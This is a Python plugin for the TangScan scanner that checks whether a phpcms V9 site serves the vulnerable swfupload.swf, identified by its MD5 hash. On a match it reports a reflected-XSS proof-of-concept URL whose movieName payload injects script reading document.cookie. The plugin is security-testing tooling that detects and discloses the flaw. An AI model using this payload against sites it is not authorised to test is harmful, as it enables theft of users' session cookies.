#! /usr/bin/env python
# -*- coding: utf-8 -*-
import md5
from thirdparty import requests
from modules.exploit import TSExploit
class TangScan(TSExploit):
def __init__(self):
super(self.__class__, self).__init__()
self.info = {
"name": "phpcms V9 /swfupload.swf XSS",
"product": "phpcmsv9",
"product_version": "",
"desc": """
phpcms V9 /swfupload.swf XSS
""",
"license": self.license.TS,
"author": ["侦探911"],
"ref": [
{self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2014-069833"},
],
"type": self.type.xss,
"severity": self.severity.low,
"privileged": False,
"disclosure_date": "",
"create_date": ""
}
self.register_option({
"url": {
"default": "",
"required": True,
"choices": [],
"convert": self.convert.url_field,
"desc": ""
}
})
self.register_result({
"status": False,
"data": {
},
"description": "",
"error": ""
})
def md5(self, content):
return md5.new(content).hexdigest()
def verify(self):
flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
exp_url = "{domain}/statics/js/swfupload/swfupload.swf".format(domain=self.option.url.rstrip('/'))
try:
response = requests.get(exp_url, verify=False, timeout=15)
except Exception, e:
self.result.error = str(e)
return
if self.md5(response.content) == flash_md5:
self.result.status = True
self.result.description = "目标 {url} 存在反射XSS, 验证url: {verify_url}".format(
url=self.option.url,
verify_url=exp_url + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//"
)
def exploit(self):
self.verify()
if __name__ == '__main__':
from modules.main import main
main(TangScan())
近期评论